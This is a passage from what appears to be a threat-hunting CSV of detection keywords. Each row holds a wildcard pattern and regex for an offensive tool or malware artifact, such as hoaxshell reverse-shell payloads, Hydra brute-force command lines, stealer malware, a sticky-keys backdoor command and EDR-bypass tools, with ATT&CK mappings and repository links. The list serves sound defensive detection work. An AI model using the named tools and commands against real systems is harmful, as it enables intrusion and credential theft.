Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*https://youareanidiot.cc*",".{0,1000}https\:\/\/youareanidiot\.cc.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://YOURREDIRECTWEBSERVER.azurewebsites.net*",".{0,1000}https\:\/\/YOURREDIRECTWEBSERVER\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*https_payload_localtunnel.ps1*",".{0,1000}https_payload_localtunnel\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_localtunnel_outfile.ps1*",".{0,1000}https_payload_localtunnel_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. 
currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_ngrok.ps1*",".{0,1000}https_payload_ngrok\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_ngrok_outfile.ps1*",".{0,1000}https_payload_ngrok_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_trusted.ps1*",".{0,1000}https_payload_trusted\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_revshell.exe*",".{0,1000}https_revshell\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*httpsmuggler.jar*",".{0,1000}httpsmuggler\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*https-portal*",".{0,1000}https\-portal.{0,1000}","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4366","291","2024-01-17T05:24:08Z","2015-12-14T20:09:04Z" "*'http-stager'*",".{0,1000}\'http\-stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*huan.exe *.exe",".{0,1000}huan\.exe\s.{0,1000}\.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.sln*",".{0,1000}Huan\.sln.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. 
It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.vcxproj*",".{0,1000}Huan\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*HuanLoader.vcxproj*",".{0,1000}HuanLoader\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*hub.docker.com/u/kalilinux/*",".{0,1000}hub\.docker\.com\/u\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*HunnicCyber/SharpDomainSpray*",".{0,1000}HunnicCyber\/SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*HVNC - Tinynuke Clone*",".{0,1000}HVNC\s\-\sTinynuke\sClone.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HVNC Server.exe*",".{0,1000}HVNC\sServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HVNC.Properties*",".{0,1000}HVNC\.Properties.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*HVNC\ Server*",".{0,1000}HVNC\\\sServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*hXOR-Packer.v0.1.zip*",".{0,1000}hXOR\-Packer\.v0\.1\.zip.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*hXOR-Packer-main*",".{0,1000}hXOR\-Packer\-main.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*hydra -*",".{0,1000}hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * ftp://*",".{0,1000}hydra\s.{0,1000}\sftp\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * http-post-form *",".{0,1000}hydra\s.{0,1000}\shttp\-post\-form\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to 
attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * mysql://*",".{0,1000}hydra\s.{0,1000}\smysql\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * ssh://*",".{0,1000}hydra\s.{0,1000}\sssh\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * telnet://*",".{0,1000}hydra\s.{0,1000}\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra smtp-enum*",".{0,1000}hydra\ssmtp\-enum.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra.c*",".{0,1000}hydra\.c.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" 
"*hydra:x:10001:*",".{0,1000}hydra\:x\:10001\:.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*HYDRA_PROXY_HTTP*",".{0,1000}HYDRA_PROXY_HTTP.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra-cobaltstrike*",".{0,1000}hydra\-cobaltstrike.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*Hyperion PE-Crypter*",".{0,1000}Hyperion\sPE\-Crypter.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*hyperion.exe *",".{0,1000}hyperion\.exe\s.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*hyperion_2.0.orig.tar.gz*",".{0,1000}hyperion_2\.0\.orig\.tar\.gz.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Hypnos-main.zip*",".{0,1000}Hypnos\-main\.zip.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*hypobrychium.exe*",".{0,1000}hypobrychium\.exe.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*hypobrychium-main*",".{0,1000}hypobrychium\-main.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" 
"*I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM*",".{0,1000}I2lmbmRlZiBQSU5HT09SCiNkZWZpbmUgUElOR09PUgoKI2RlZmluZSBTRVJWRVJJUCAiM.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*i2pinstall*",".{0,1000}i2pinstall.{0,1000}","offensive_tool_keyword","I2P","I2P - The Invisible Internet Project.","T1048.001 - T1568.003","TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://geti2p.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*iam__enum_assume_role/default-word-list.txt*",".{0,1000}iam__enum_assume_role\/default\-word\-list\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*iAmAnIndependentStrongPassswordThatNeedsToBeSecure*",".{0,1000}iAmAnIndependentStrongPassswordThatNeedsToBeSecure.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*iamlordvoldemort@31337schoolofhackingandwizardry.com*",".{0,1000}iamlordvoldemort\@31337schoolofhackingandwizardry\.com.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for 
Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*iammaguire/Gotato*",".{0,1000}iammaguire\/Gotato.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*IAS -Process *aad3b435b51404eeaad3b435b51404ee*",".{0,1000}IAS\s\-Process\s.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*IAS -Process {GNLPH}*$excludedUsernames=@(""Guest*DefaultAccount*WDAGUtilityAccount*",".{0,1000}IAS\s\-Process\s\{GNLPH\}.{0,1000}\$excludedUsernames\=\@\(\""Guest.{0,1000}DefaultAccount.{0,1000}WDAGUtilityAccount.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*ibmiscanner2john.py*",".{0,1000}ibmiscanner2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ibnejdfjmmkpcnlpebklmnkoeoihofec*",".{0,1000}ibnejdfjmmkpcnlpebklmnkoeoihofec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*IBurpExtender.java*",".{0,1000}IBurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*IBurpExtenderCallbacks.java*",".{0,1000}IBurpExtenderCallbacks\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation 
tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*icacls c:\windows\system32\sethc.exe*",".{0,1000}icacls\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*icebreaker:P@ssword123456*",".{0,1000}icebreaker\:P\@ssword123456.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*icebreaker-master.zip*",".{0,1000}icebreaker\-master\.zip.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*icebreaker-scan.xml*",".{0,1000}icebreaker\-scan\.xml.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" 
"*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*IcebreakerSecurity/DelegationBOF*",".{0,1000}IcebreakerSecurity\/DelegationBOF.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*IcebreakerSecurity/PersistBOF*",".{0,1000}IcebreakerSecurity\/PersistBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 